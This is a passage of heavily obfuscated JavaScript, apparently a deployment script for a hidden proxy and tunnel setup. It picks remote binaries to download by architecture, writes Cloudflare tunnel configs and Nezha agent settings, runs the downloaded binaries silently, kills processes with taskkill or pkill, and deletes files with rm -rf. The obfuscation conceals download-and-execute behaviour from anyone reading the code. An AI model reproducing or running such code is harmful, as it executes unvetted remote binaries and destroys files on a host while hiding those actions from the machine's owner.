_0x388b12(_0x1ce768,_0x4dc783-0xfc,_0x141f00-0x1f,_0x141f00-0x354);}_0x481542['ybrCR']='ARGO_DOMAI'+_0xecb568(-0x32,0x5b,-0xd9,0xf2)+_0xecb568(0x1b2,0x179,0x133,0x2c3)+_0x14926d(0x5a9,0x582,0x58e,0x6d5)+_0x14926d(0x7ff,0x7eb,0x6a2,0x774)+_0x14926d(0x827,0x81b,0x703,0x746)+'s',_0x481542['mFAyG']=_0xecb568(0x11e,0x175,0xc8,0x257)+'et',_0x481542[_0x14926d(0x6b1,0x6c6,0x63b,0x5e5)]=_0x14926d(0x79e,0x761,0x6af,0x800)+'n',_0x481542[_0xecb568(-0xab,-0x51,-0x15f,0xbb)]='tunnel.yml',_0x481542[_0xecb568(0x31,-0xf8,-0x91,0x90)]='ARGO_AUTH\x20'+_0x14926d(0x419,0x4f9,0x4e8,0x4d2)+_0xecb568(0x43,0x62,0x68,0xcd)+_0xecb568(-0x74,-0x86,-0x4e,-0xfa)+_0xecb568(-0xaa,-0x129,0xad,-0x1b0)+_0xecb568(0x1ea,0x299,0x17b,0x1cd),_0x481542[_0xecb568(-0x4a,0x28,-0x137,0xf1)]=function(_0x42dcea,_0x31d6f2){return _0x42dcea===_0x31d6f2;};function _0xecb568(_0x210ee9,_0x4a9fda,_0x459944,_0x498675){return _0x388b12(_0x498675,_0x4a9fda-0x19d,_0x459944-0x22,_0x210ee9- -0x1be);}_0x481542[_0xecb568(0x10b,0xd2,0x60,0xa2)]='arm',_0x481542['juUrZ']=_0x14926d(0x4f9,0x504,0x637,0x53a)+_0xecb568(-0xd3,-0x1f3,-0xc,-0x21e)+_0x14926d(0x468,0x375,0x47c,0x5b9),_0x481542[_0xecb568(-0xad,-0xbc,0x7b,-0x149)]=_0x14926d(0x682,0x532,0x637,0x6a8)+_0xecb568(-0xd3,-0x63,0x11,-0xf2)+'yc.mn/bot',_0x481542[_0xecb568(0x94,0xa,0x1aa,0xfc)]=function(_0xc2f640,_0xa82354){return _0xc2f640===_0xa82354;},_0x481542[_0x14926d(0x4ec,0x697,0x547,0x5d9)]=_0xecb568(0x1eb,0x25d,0x2dd,0x135),_0x481542[_0xecb568(0xcd,0x181,0x1a1,0x92)]=_0x14926d(0x5c9,0x66f,0x655,0x7b0),_0x481542['kohBo']=function(_0xee503,_0xbb6c59){return _0xee503===_0xbb6c59;},_0x481542[_0x14926d(0x6ad,0x864,0x6ff,0x81c)]=_0xecb568(-0x93,-0x112,-0xf1,0x7f),_0x481542[_0x14926d(0x586,0x580,0x64d,0x508)]=function(_0x249ecb,_0xa85c97){return _0x249ecb===_0xa85c97;},_0x481542[_0x14926d(0x467,0x4d8,0x57d,0x63a)]=_0xecb568(0x110,0x199,0x212,0x11e)+_0xecb568(0xf2,-0x6f,0x18e,0x12f)+_0xecb568(0x96,-0xb,-0xca,0xc7);const _0x119f2e=_0x481542;let _0x133d62;if(_0x119f2e[_0xecb568(-0x4a,-0x192,0x91,0x7a)](_0x343f5c,_0x119f2e[_0x14926d(0x54d,0x6a8,0x61d,0x76e)])){const _0x5dc34d={};_0x5dc34d[_0xecb568(-0x98,-0x11f,-0x82,-0x59)]=webPath,_0x5dc34d['fileUrl']=_0x119f2e[_0x14926d(0x7c3,0x889,0x71a,0x60a)];const _0x1ea66f={};_0x1ea66f[_0xecb568(-0x98,0xc6,-0x1f7,-0x15c)]=botPath,_0x1ea66f['fileUrl']=_0x119f2e[_0x14926d(0x2fe,0x5b8,0x465,0x4df)],_0x133d62=[_0x5dc34d,_0x1ea66f];}else{const _0x458895={};_0x458895[_0xecb568(-0x98,-0x153,-0x10c,-0x22)]=webPath,_0x458895[_0x14926d(0x57e,0x562,0x4cb,0x484)]=_0x14926d(0x66b,0x56f,0x622,0x515)+'d64.ssss.n'+_0x14926d(0x468,0x458,0x47c,0x327);const _0x32bdca={};_0x32bdca[_0xecb568(-0x98,-0xc7,0xb5,-0x16f)]=botPath,_0x32bdca[_0xecb568(-0x47,0x99,-0x49,-0xc3)]=_0x14926d(0x606,0x53c,0x622,0x67f)+_0xecb568(0xf2,-0x6b,0x212,0x184)+_0xecb568(-0x1d,0xf5,0x76,-0x27),_0x133d62=[_0x458895,_0x32bdca];}if(NEZHA_SERVER&&NEZHA_KEY){if(_0x119f2e['cjFrn'](_0x119f2e[_0x14926d(0x5d1,0x533,0x547,0x68c)],_0x119f2e[_0xecb568(0xcd,0x68,0x1a4,-0x14)])){if(_0x119f2e[_0x14926d(0x486,0x575,0x5cd,0x649)](!_0x1409d5,!_0x1041b2)){_0x57ab56[_0x14926d(0x5ee,0x3d4,0x4ca,0x519)](_0x119f2e['ybrCR']);return;}if(_0x431fd2['includes'](_0x119f2e[_0x14926d(0x39b,0x5be,0x45f,0x4be)])){_0x2389b6['writeFileS'+'ync'](_0x20e868['join'](_0x4b9fd6,_0x119f2e['vkduG']),_0x5be94f);const _0x142ae7=_0x14926d(0x5a0,0x495,0x600,0x63b)+'\x20'+_0x336f18[_0xecb568(0xa3,0x53,0xa9,-0x7e)]('\x22')[0x1a1c+-0x19d4+-0x3d*0x1]+(_0xecb568(0x59,0x16e,-0x75,0x14b)+_0xecb568(0x1e9,0xe8,0x21e,0x224)+'\x20')+_0x54a8ee['join'](_0x48608a,_0x119f2e[_0x14926d(0x79e,0x69d,0x63b,0x6c1)])+('\x0a\x20\x20protoco'+_0x14926d(0x85a,0x7dc,0x702,0x6c0)+'\x20\x0a\x20\x20ingres'+_0xecb568(0x1e1,0x218,0x2a1,0x34a)+_0x14926d(0x67a,0x5d4,0x5b1,0x517))+_0x5d0eef+(_0x14926d(0x522,0x4fc,0x4d2,0x46f)+'vice:\x20http'+_0xecb568(0x1ad,0x1bf,0x15d,0x243)+_0xecb568(-0x81,0xdf,-0x126,-0xe0))+_0x49b031+('\x0a\x20\x20\x20\x20\x20\x20ori'+'ginRequest'+_0xecb568(0xe5,-0x3d,0x1ac,0x248)+_0xecb568(-0x2f,0x13c,0x14,-0x23)+'y:\x20true\x0a\x20\x20'+'\x20\x20-\x20servic'+'e:\x20http_st'+_0x14926d(0x3cd,0x635,0x4db,0x613)+'\x20');_0x27e741['writeFileS'+_0xecb568(-0x3d,-0x7a,0x98,-0xe7)](_0x192938['join'](_0x5c211a,_0x119f2e['VtjId']),_0x142ae7);}else _0x26f777[_0xecb568(-0x48,-0xb8,-0x140,-0x1a4)](_0x119f2e[_0x14926d(0x4f6,0x60f,0x543,0x435)]);}else{if(NEZHA_PORT){if(_0x119f2e[_0xecb568(0x52,0x9,0xf6,-0xe0)](_0xecb568(-0x93,-0x4b,-0x14,-0x82),_0x119f2e[_0xecb568(0x1ed,0xb4,0xd5,0x187)])){const _0x15949f=_0x119f2e[_0x14926d(0x5ae,0x4f3,0x64d,0x642)](_0x343f5c,_0xecb568(0x1e5,0xef,0x32b,0x2eb))?'https://ar'+_0x14926d(0x562,0x442,0x43f,0x4b5)+_0xecb568(0x166,0x20d,0x9b,0x1f1)+'t':_0x14926d(0x6de,0x59e,0x622,0x776)+_0x14926d(0x693,0x49c,0x604,0x700)+_0x14926d(0x7cc,0x7df,0x678,0x7cf)+'t',_0x451d2e={};_0x451d2e[_0x14926d(0x550,0x35f,0x47a,0x553)]=npmPath,_0x451d2e[_0xecb568(-0x47,0x9e,0x93,-0x170)]=_0x15949f,_0x133d62[_0x14926d(0x7f6,0x74e,0x6ad,0x53f)](_0x451d2e);}else _0x5a2589[_0xecb568(-0x48,0x3f,-0xf4,0x67)](_0x2a5459+(_0x14926d(0x79d,0x834,0x6fe,0x632)+_0x14926d(0x579,0x57c,0x597,0x452)));}else{const _0x25d2dd=_0x119f2e['kohBo'](_0x343f5c,_0x119f2e[_0x14926d(0x58d,0x556,0x61d,0x623)])?_0xecb568(0x125,0xb2,0x35,0xe9)+_0xecb568(-0xd3,-0xaa,-0x2c,-0x228)+_0x14926d(0x5ad,0x6c3,0x5a8,0x5dd):_0x119f2e[_0x14926d(0x4f1,0x59d,0x57d,0x42e)],_0x463dac={};_0x463dac[_0x14926d(0x492,0x322,0x47a,0x33b)]=phpPath,_0x463dac['fileUrl']=_0x25d2dd,_0x133d62['unshift'](_0x463dac);}}}return _0x133d62;}function argoType(){const _0xbea8ea={};_0xbea8ea[_0x25b31b(0x418,0x1f2,0x2de,0x1a7)]=function(_0x2d15eb,_0x3b0a1b){return _0x2d15eb||_0x3b0a1b;},_0xbea8ea[_0x318e6b(0x195,0xa4,0x151,-0x70)]=function(_0x3db220,_0x2e09de){return _0x3db220!==_0x2e09de;},_0xbea8ea[_0x25b31b(0xb1,0x118,0x142,0x213)]=_0x25b31b(0x2b8,0x2b4,0x1ac,0x5c),_0xbea8ea[_0x25b31b(0x1ba,0x225,0x2d9,0x238)]=_0x318e6b(0x11a,-0x35,-0x192,-0x89)+'et',_0xbea8ea[_0x25b31b(0x1f1,-0x1d,0x13d,0x7e)]=_0x318e6b(0x196,0x4a,-0x11c,-0x10a)+'n';function _0x25b31b(_0x209ea0,_0x135e1c,_0x237099,_0x10d59a){return _0x388b12(_0x209ea0,_0x135e1c-0x70,_0x237099-0x1d7,_0x237099- -0x62);}_0xbea8ea[_0x25b31b(0x11c,0x344,0x26e,0x214)]='tunnel.yml',_0xbea8ea['FiuQS']='ARGO_AUTH\x20'+_0x318e6b(-0x2df,-0x17d,-0x5d,-0x258)+_0x25b31b(0xc9,0x196,0x19f,0x1a2)+_0x25b31b(0x1bd,0x13e,0xe8,0x110)+_0x25b31b(0x1cf,0x29,0xb2,-0x2b)+'to\x20tunnel';const _0x505403=_0xbea8ea;if(_0x505403['yiQYG'](!ARGO_AUTH,!ARGO_DOMAIN)){if(_0x505403[_0x318e6b(0x30,0xa4,0x2,-0x63)](_0x505403['eNuRO'],'pCHNp')){console[_0x318e6b(-0xf2,-0x19b,-0x24d,-0x24f)]('ARGO_DOMAI'+_0x318e6b(-0x16a,-0x185,-0x296,-0x27b)+_0x318e6b(-0xb7,0x5f,-0xbe,0x166)+_0x318e6b(0x64,-0xd7,-0x41,-0xe8)+_0x318e6b(-0x12a,0x3d,-0x48,-0x2b)+_0x318e6b(-0x55,0x9e,0x1e2,0x57)+'s');return;}else return null;}function _0x318e6b(_0x4db4e4,_0x182ffd,_0x5c501b,_0x95da38){return _0x388b12(_0x95da38,_0x182ffd-0x95,_0x5c501b-0x4,_0x182ffd- -0x311);}if(ARGO_AUTH[_0x25b31b(0x34c,0x14e,0x20a,0xa2)](_0x505403['TKJPn'])){fs['writeFileS'+_0x25b31b(0xe4,0x221,0x11f,0x10f)](path[_0x25b31b(0x2cf,0x2ad,0x2c1,0x1de)](FILE_PATH,_0x505403['SWVAP']),ARGO_AUTH);const _0x13e5ad='\x0a\x20\x20tunnel:'+'\x20'+ARGO_AUTH['split']('\x22')[-0x9fc+-0xcdb+0x16e2]+(_0x318e6b(-0x21,-0xfa,-0x44,-0x1aa)+_0x25b31b(0x47c,0x33b,0x345,0x2ff)+'\x20')+path[_0x25b31b(0x249,0x3a5,0x2c1,0x182)](FILE_PATH,_0x505403[_0x318e6b(-0x262,-0x172,-0x178,-0x122)])+(_0x25b31b(0x47c,0x267,0x33f,0x2a2)+_0x25b31b(0x40c,0x3aa,0x34c,0x4b9)+_0x318e6b(-0x33,0x27,0x18f,-0xb1)+_0x25b31b(0x271,0x24c,0x33d,0x210)+_0x318e6b(-0x76,-0xb4,0x35,-0x1f8))+ARGO_DOMAIN+('\x0a\x20\x20\x20\x20\x20\x20ser'+_0x25b31b(0x377,0x2c6,0x2ac,0x24b)+_0x318e6b(-0x83,0x5a,0x9b,0xd8)+'st:')+ARGO_PORT+(_0x25b31b(0x2e5,0x28f,0x2c3,0x28c)+'ginRequest'+':\x0a\x20\x20\x20\x20\x20\x20\x20\x20'+_0x318e6b(-0x15c,-0x182,-0x1f2,-0x9f)+_0x25b31b(0xb6,0x280,0x1f4,0x16e)+_0x318e6b(-0xee,-0x4a,0xd9,-0x95)+'e:\x20http_st'+_0x318e6b(-0x22c,-0x18a,-0x281,-0x1b5)+'\x20');fs[_0x318e6b(-0xd2,-0xc2,-0xa0,-0x7c)+_0x25b31b(0x104,0x87,0x11f,0x12b)](path['join'](FILE_PATH,_0x505403['wSPWO']),_0x13e5ad);}else console[_0x25b31b(0xfc,0xb6,0x114,0xa4)](_0x505403['FiuQS']);}argoType();async function extractDomains(){function _0x58ecb0(_0x17213f,_0x10c265,_0x5ee871,_0x349d1e){return _0x388b12(_0x349d1e,_0x10c265-0x151,_0x5ee871-0x37,_0x17213f-0x11b);}const _0x2b4ffb={'dwmlo':_0x58ecb0(0x28d,0x348,0x3b8,0x20c)+'d!','DANZE':function(_0x5a57e5,_0x5602c8){return _0x5a57e5(_0x5602c8);},'vlqJY':_0x58ecb0(0x320,0x24a,0x2d7,0x3da),'UZmqO':function(_0x76ac83,_0x4fe794){return _0x76ac83!==_0x4fe794;},'kdHvH':_0x58ecb0(0x327,0x2a0,0x288,0x476),'WTPVz':function(_0x4c7fd1,_0x30776c){return _0x4c7fd1(_0x30776c);},'QyGcB':function(_0x56ba08,_0x2d7840){return _0x56ba08(_0x2d7840);},'jhSSu':function(_0x4ee8f1,_0x3fa29d,_0x335f53,_0xc803b9){return _0x4ee8f1(_0x3fa29d,_0x335f53,_0xc803b9);},'FMudI':_0x522b5f(0x9b,-0xf1,0x0,0xc1)+'for\x20using\x20'+'this\x20scrip'+'t,\x20enjoy!','SVRRY':function(_0x40c7fe,_0xe00e3b,_0x1eccfa){return _0x40c7fe(_0xe00e3b,_0x1eccfa);},'DroDo':_0x522b5f(0xa9,-0x97,0x50,0x156),'fqhqV':_0x58ecb0(0x4bb,0x3d1,0x45a,0x571),'xVpuO':_0x522b5f(0x9c,-0xf2,-0x4d,0x108),'HjVmV':_0x58ecb0(0x29f,0x1db,0x33e,0x1c3),'jRPVY':function(_0x4633b7){return _0x4633b7();},'NpVrS':function(_0x281f1c,_0x45bbf3){return _0x281f1c===_0x45bbf3;},'NgEGI':'JjmUZ','nJmJK':function(_0x3c1873,_0x299f9f,_0x13b827){return _0x3c1873(_0x299f9f,_0x13b827);},'xsKEd':_0x522b5f(-0x19f,-0x175,-0x187,-0x160)+'\x20https://s'+_0x522b5f(-0x18b,-0x50,-0x88,-0x18e)+'flare.com/'+_0x522b5f(-0xa3,-0x8a,-0x7e,0xa3)+_0x522b5f(-0x88,-0x1b0,-0xf0,-0x231)+_0x58ecb0(0x451,0x54d,0x58b,0x4ec)+_0x58ecb0(0x3d5,0x2f4,0x340,0x348)+_0x522b5f(-0x125,-0x37c,-0x239,-0x2c0)+_0x522b5f(-0x1cc,0x87,-0x94,-0x1a5),'KUfAP':function(_0xe772b5,_0x198580){return _0xe772b5&&_0x198580;},'LpIUz':function(_0x424eb5,_0x41bba1){return _0x424eb5===_0x41bba1;},'RbMcw':_0x58ecb0(0x360,0x483,0x460,0x289),'QhrTz':_0x58ecb0(0x2c9,0x1fe,0x3f3,0x198),'oXqFM':'keOiO','mlbHT':_0x58ecb0(0x304,0x281,0x20d,0x34a),'QBGRs':function(_0x56e926,_0x102b6f){return _0x56e926>_0x102b6f;},'vQdCr':function(_0x322a68,_0x20d06b){return _0x322a68===_0x20d06b;},'HZBGD':_0x58ecb0(0x446,0x36d,0x3c3,0x38b),'SmHZn':function(_0x2b9931){return _0x2b9931();},'PHKNC':function(_0x31ef46,_0x5d0a4f){return _0x31ef46(_0x5d0a4f);},'RjgKI':function(_0xefbba6){return _0xefbba6();},'owKhp':_0x522b5f(-0x2cf,-0x279,-0x200,-0x1c2)};function _0x522b5f(_0x2f7518,_0x38e70e,_0x2cd688,_0x2b0f95){return _0x4d5570(_0x2f7518-0xc,_0x2cd688- -0x5cb,_0x2cd688-0x10a,_0x38e70e);}let _0x497348;if(_0x2b4ffb[_0x58ecb0(0x2f3,0x289,0x1a6,0x2fe)](ARGO_AUTH,ARGO_DOMAIN))_0x497348=ARGO_DOMAIN,console[_0x522b5f(-0x283,-0x217,-0x203,-0x343)]('ARGO_DOMAI'+'N:',_0x497348),await _0x2b4ffb[_0x522b5f(-0x1dc,-0x22c,-0x20d,-0x224)](_0x1d763a,_0x497348);else{if(_0x2b4ffb[_0x522b5f(-0x23f,-0x1ea,-0x235,-0x1ca)](_0x2b4ffb[_0x522b5f(-0x42,0x37,-0x22,-0x38)],_0x2b4ffb['QhrTz']))_0x1c764b['send'](_0x2b4ffb[_0x58ecb0(0x480,0x588,0x54a,0x518)]);else try{if(_0x522b5f(-0x241,-0x2e1,-0x26c,-0x2ea)!==_0x2b4ffb[_0x58ecb0(0x408,0x4bd,0x555,0x483)])_0x21b2ee?_0x3fbadf(_0x3f48b8):_0x2b4ffb[_0x522b5f(0x17,-0x57,-0x159,-0x22d)](_0x5cf5de,_0x29db8d);else{const _0x30705e=fs[_0x522b5f(-0x114,-0xbf,-0xfb,-0x1e9)+'nc'](path['join'](FILE_PATH,_0x2b4ffb[_0x522b5f(-0x116,-0x138,-0x42,0x12)]),_0x2b4ffb[_0x522b5f(-0x245,-0xf4,-0x131,-0xd)]),_0x5372f5=_0x30705e[_0x58ecb0(0x37c,0x2a0,0x340,0x2c6)]('\x0a'),_0x155b8d=[];_0x5372f5['forEach'](_0x536070=>{function _0x2adad7(_0x1b4e2d,_0x296aed,_0x785ee2,_0x108900){return _0x58ecb0(_0x296aed- -0x4b5,_0x296aed-0xf4,_0x785ee2-0x13e,_0x1b4e2d);}const _0x41634e=_0x536070[_0x1e035a(0x527,0x608,0x6db,0x754)](/https?:\/\/([^ ]*trycloudflare\.com)\/?/);function _0x1e035a(_0x22acb1,_0x16923e,_0xc24969,_0x276021){return _0x58ecb0(_0x16923e-0x244,_0x16923e-0x1cf,_0xc24969-0x188,_0xc24969);}if(_0x41634e){const _0x4f236f=_0x41634e[0x1cc+-0x2c*0x61+-0xee1*-0x1];_0x155b8d[_0x2adad7(-0xed,-0x1e,-0x172,-0x120)](_0x4f236f);}});if(_0x2b4ffb[_0x522b5f(0x14,0x8f,0x43,-0x11c)](_0x155b8d[_0x522b5f(-0x67,0x8e,-0x19,-0x67)],-0x235f+0x266*0x1+-0x17*-0x16f))_0x497348=_0x155b8d[-0x2152*0x1+0xa22*-0x1+0x2b74],console[_0x522b5f(-0x319,-0x179,-0x203,-0xa3)]('ArgoDomain'+':',_0x497348),await _0x2b4ffb[_0x58ecb0(0x33b,0x3be,0x40f,0x2b2)](_0x1d763a,_0x497348);else{if(_0x2b4ffb[_0x522b5f(-0x16,-0x79,-0x7,0xd2)](_0x2b4ffb[_0x58ecb0(0x406,0x56a,0x39d,0x332)],_0x2b4ffb[_0x58ecb0(0x406,0x55d,0x4ce,0x2f0)])){console[_0x58ecb0(0x291,0x361,0x221,0x15f)](_0x58ecb0(0x45a,0x4bf,0x5ac,0x366)+_0x522b5f(-0xee,-0x7,-0xc0,0x59)+_0x522b5f(-0x267,-0x37f,-0x21c,-0x2b7)+'ng\x20bot\x20to\x20'+_0x58ecb0(0x2ed,0x211,0x205,0x1b5)+_0x58ecb0(0x24f,0x20f,0x2c2,0x1ed)),fs[_0x58ecb0(0x3da,0x300,0x3da,0x37b)](path[_0x522b5f(-0x1,-0xd4,-0x56,-0x4a)](FILE_PATH,_0x2b4ffb[_0x58ecb0(0x452,0x567,0x415,0x410)]));async function _0x4cba5e(){const _0x48237d={};_0x48237d[_0x3dd76e(0x15e,0x109,0x12f,0x31)]=_0x2b4ffb[_0x3dd76e(0xd9,0xf,0x154,-0x94)];const _0x3cb8c7=_0x48237d;function _0x4779bc(_0xa31f25,_0x4ca2cc,_0x42627e,_0xb0a62){return _0x58ecb0(_0x42627e- -0x1,_0x4ca2cc-0xa1,_0x42627e-0x1cb,_0x4ca2cc);}function _0x3dd76e(_0x4aa663,_0x51a395,_0x4cb79a,_0x531121){return _0x58ecb0(_0x4aa663- -0x28a,_0x51a395-0x1b5,_0x4cb79a-0xeb,_0x4cb79a);}try{_0x2b4ffb[_0x3dd76e(0xe9,0x102,0xa2,-0x17)](_0x3dd76e(0x5a,0x5d,0x75,-0xf2),_0x2b4ffb['kdHvH'])?process['platform']===_0x3dd76e(-0x4d,-0x125,-0x124,0x62)?await exec(_0x3dd76e(0x1c,0x10f,-0x141,0x5f)+'f\x20/im\x20'+botName+('.exe\x20>\x20nul'+'\x202>&1')):await _0x2b4ffb[_0x4779bc(0x15c,0x218,0x286,0x376)](exec,_0x3dd76e(-0x10,-0x15a,-0x16,0xfa)+'['+botName[_0x4779bc(0x2b6,0x1e2,0x275,0x11c)](-0x712+-0xff1+0x1703*0x1)+']'+botName[_0x4779bc(0x27b,0x475,0x353,0x310)](0x97*0x13+-0x17f*-0x16+-0x2c1e)+(_0x4779bc(0x48a,0x44a,0x33c,0x437)+_0x3dd76e(0x143,0x195,0x1c0,0x265))):_0x246e3b=_0x578edb[_0x3dd76e(0x10f,0x1e,0x230,0xb4)+'nc'](_0x4e057c,_0x3cb8c7[_0x4779bc(0x2e6,0x508,0x3e7,0x4f2)]);}catch(_0x5b8a0d){}}_0x2b4ffb[_0x58ecb0(0x248,0x3a5,0x2ba,0x347)](_0x4cba5e),await new Promise(_0x4cf4f7=>setTimeout(_0x4cf4f7,0xd9*0x9+-0x20d7+0xa3*0x3a));const _0x238c9d='tunnel\x20--e'+_0x522b5f(0x38,-0x159,-0x73,0x6f)+_0x522b5f(-0x165,-0x81,-0x48,-0xf4)+'--no-autou'+_0x522b5f(-0xc9,0x39,0x25,0x129)+_0x522b5f(-0x2b,-0x54,-0x111,0x58)+_0x58ecb0(0x423,0x3e4,0x57c,0x4e5)+_0x58ecb0(0x2dc,0x1b5,0x370,0x37d)+FILE_PATH+(_0x522b5f(-0x111,-0x25c,-0xff,-0x9b)+_0x58ecb0(0x4a6,0x5be,0x3bc,0x5de)+_0x522b5f(-0x232,-0x27e,-0x26a,-0x1ec)+_0x58ecb0(0x293,0x2c4,0x142,0x3d0)+_0x58ecb0(0x280,0x149,0x226,0x129))+ARGO_PORT;try{await _0x2b4ffb[_0x58ecb0(0x348,0x359,0x43a,0x378)](exec,_0x58ecb0(0x481,0x594,0x511,0x494)+botPath+'\x20'+_0x238c9d+(_0x522b5f(-0x177,-0x15e,-0x281,-0x120)+'l\x202>&1\x20&')),console[_0x58ecb0(0x291,0x25f,0x1d7,0x1d1)](botName+(_0x522b5f(-0x230,-0xb2,-0x18c,-0x1bc)+'g')),await new Promise(_0x583a69=>setTimeout(_0x583a69,0x17*0x147+0x1a8e+-0xe7*0x31)),await _0x2b4ffb[_0x522b5f(-0x205,-0x97,-0xcb,-0xf5)](extractDomains);}catch(_0x279a33){_0x2b4ffb[_0x58ecb0(0x25f,0x11e,0x177,0x2ef)](_0x58ecb0(0x237,0x1f5,0x15c,0x393),'PTHlr')?console[_0x522b5f(-0x1fe,-0x140,-0x124,-0x19)]('Error\x20exec'+_0x522b5f(0xbd,0x1c,-0x9a,-0x86)+_0x58ecb0(0x377,0x281,0x447,0x21a)+_0x279a33):_0x2b4ffb[_0x522b5f(-0x363,-0x2e8,-0x27f,-0x1d9)](_0x5b5b08,_0x5ea02a[_0x58ecb0(0x241,0x355,0x103,0x23f)],_0x1fc232[_0x58ecb0(0x292,0x384,0x355,0x20a)],(_0x529817,_0x1deeef)=>{function _0x17d85a(_0xcd77bb,_0x4202be,_0x2d665e,_0x37ab17){return _0x58ecb0(_0x4202be- -0x21c,_0x4202be-0x17,_0x2d665e-0x13d,_0xcd77bb);}_0x529817?_0x2b4ffb['DANZE'](_0x5dee33,_0x529817):_0x2b4ffb[_0x17d85a(0x1e,0xc6,0xf9,0x11e)](_0x34e8a3,_0x1deeef);});}}else{const _0x4bb3b6={};_0x4bb3b6[_0x58ecb0(0x2e8,0x347,0x247,0x353)]=_0x2b4ffb[_0x58ecb0(0x23a,0x150,0x2cd,0x2b8)];const _0x1b1372=_0x4bb3b6;_0x2b4ffb[_0x58ecb0(0x23e,0x218,0x1d7,0x18c)](_0x1c37ed,'rm\x20-rf\x20'+_0x33fb56[_0x58ecb0(0x43e,0x4ef,0x405,0x2d0)]('\x20')+('\x20>/dev/nul'+_0x58ecb0(0x4de,0x60f,0x416,0x3e0)),_0x4a74e0=>{_0xa07b46[_0x37f054(0x109,0x5f,-0x101,0x11b)]();function _0x46745a(_0x6c99f5,_0x4fa519,_0x27ae97,_0x23fd0b){return _0x522b5f(_0x6c99f5-0x97,_0x27ae97,_0x23fd0b-0x36c,_0x23fd0b-0x49);}function _0x37f054(_0x48fffc,_0xd385b1,_0x1a1a70,_0x2a59fa){return _0x58ecb0(_0xd385b1- -0x1f8,_0xd385b1-0xb,_0x1a1a70-0xdc,_0x48fffc);}_0x415f0b[_0x37f054(0x1dc,0x99,-0xc8,0xd0)](_0x37f054(0x20f,0x114,0x5,0xa1)+_0x46745a(0x3a8,0x420,0x28a,0x334)),_0x18fd2b['log'](_0x1b1372[_0x37f054(0xc,0xf0,0xc9,0xbb)]);});}}}}catch(_0x2ba423){if(_0x2b4ffb[_0x522b5f(-0x269,-0x236,-0x121,-0xd6)](_0x2b4ffb[_0x58ecb0(0x465,0x3ca,0x409,0x311)],_0x58ecb0(0x294,0x3d1,0x373,0x14a))){const _0x17fcb1=_0x231714[_0x522b5f(0x69,-0x73,-0x74,0xf4)+'r'][_0x58ecb0(0x303,0x249,0x299,0x2f2)][_0x58ecb0(0x398,0x4da,0x4d7,0x438)](_0x3a2ddb),_0x3a8c49=_0x57739f[_0x3c8fd9],_0x56f9e2=_0x54e807[_0x3a8c49]||_0x17fcb1;_0x17fcb1[_0x58ecb0(0x339,0x2c3,0x2eb,0x1ce)]=_0x28e1fc[_0x522b5f(-0x211,-0x169,-0xfc,-0x1ec)](_0x27144e),_0x17fcb1[_0x522b5f(-0x59,-0x287,-0x1a2,-0x160)]=_0x56f9e2[_0x58ecb0(0x2f2,0x38c,0x1a9,0x33d)]['bind'](_0x56f9e2),_0x4b8dfb[_0x3a8c49]=_0x17fcb1;}else console[_0x522b5f(0x3c,-0xa0,-0x124,-0x20d)](_0x522b5f(0xb2,0xc5,-0x3c,-0xc4)+_0x522b5f(-0xb5,-0x19e,-0x7f,-0x88)+'og:',_0x2ba423);}}async function _0x1d763a(_0x5a2178){function _0x850776(_0x61a5f9,_0x178347,_0x5f0fad,_0x1412f3){return _0x522b5f(_0x61a5f9-0xf2,_0x1412f3,_0x61a5f9-0x503,_0x1412f3-0x2f);}const _0x59e0c0={'YZhBD':_0x2b4ffb[_0x284a46(0x38a,0x465,0x421,0x4b6)],'aySnF':'base64','VLvXP':_0x850776(0x3a4,0x2ee,0x29b,0x3f4)+';\x20charset='+_0x284a46(0x524,0x5d6,0x458,0x4cb),'zHWTp':_0x2b4ffb[_0x284a46(0x405,0x554,0x4c8,0x42e)],'VHsyW':_0x2b4ffb[_0x284a46(0x41d,0x5f4,0x581,0x534)],'HjKwF':_0x2b4ffb[_0x284a46(0x64e,0x575,0x579,0x59b)],'OMHZG':function(_0x55fa15){return _0x2b4ffb['jRPVY'](_0x55fa15);}};function _0x284a46(_0x1d398e,_0x125cdd,_0x23fada,_0x24939f){return _0x58ecb0(_0x24939f-0x1ab,_0x125cdd-0x17c,_0x23fada-0x15d,_0x125cdd);}if(_0x2b4ffb[_0x284a46(0x63a,0x64b,0x574,0x535)](_0x850776(0x526,0x3f1,0x57e,0x618),_0x2b4ffb['NgEGI']))_0x51a965['unlinkSync'](_0x46d7b5);else{const _0x5ded2f={};_0x5ded2f[_0x284a46(0x2b2,0x4c7,0x33e,0x3ed)]=_0x284a46(0x47a,0x5a2,0x39c,0x4cb);const _0xe74c34=_0x2b4ffb[_0x850776(0x369,0x2e0,0x4ae,0x389)](execSync,_0x2b4ffb['xsKEd'],_0x5ded2f),_0x3e3108=_0xe74c34[_0x850776(0x356,0x473,0x39d,0x21c)](),_0x1fed17=NAME?NAME+'-'+_0x3e3108:_0x3e3108;return new Promise(_0x176535=>{setTimeout(()=>{const _0x5c6142={};_0x5c6142[_0x2d4c1b(-0x260,-0x139,-0x237,-0x264)]=function(_0x4760fb,_0x2b16d0){return _0x4760fb!==_0x2b16d0;};function _0x25f992(_0x8cee87,_0x318533,_0x1a8eb3,_0x1a8473){return _0x4971(_0x318533- -0x1b2,_0x1a8473);}_0x5c6142[_0x25f992(0xdb,0x13a,0x182,0x8f)]=_0x59e0c0[_0x25f992(0x15c,0x1c5,0x84,0x24e)],_0x5c6142['VaVjK']=_0x59e0c0[_0x2d4c1b(-0x1a4,-0x2cf,-0x82,-0x1d5)];function _0x2d4c1b(_0x11f03f,_0x513630,_0x5f3eba,_0x5d1702){return _0x4971(_0x11f03f- -0x3a1,_0x513630);}_0x5c6142['fqjvW']=_0x25f992(0x1a1,0x1da,0x87,0xa5)+'pe',_0x5c6142[_0x25f992(0x27e,0x256,0x35d,0x180)]=_0x59e0c0['VLvXP'];const _0x35dc12=_0x5c6142;if(_0x25f992(0x214,0xd0,-0x2f,0x9a)!==_0x59e0c0['zHWTp']){const 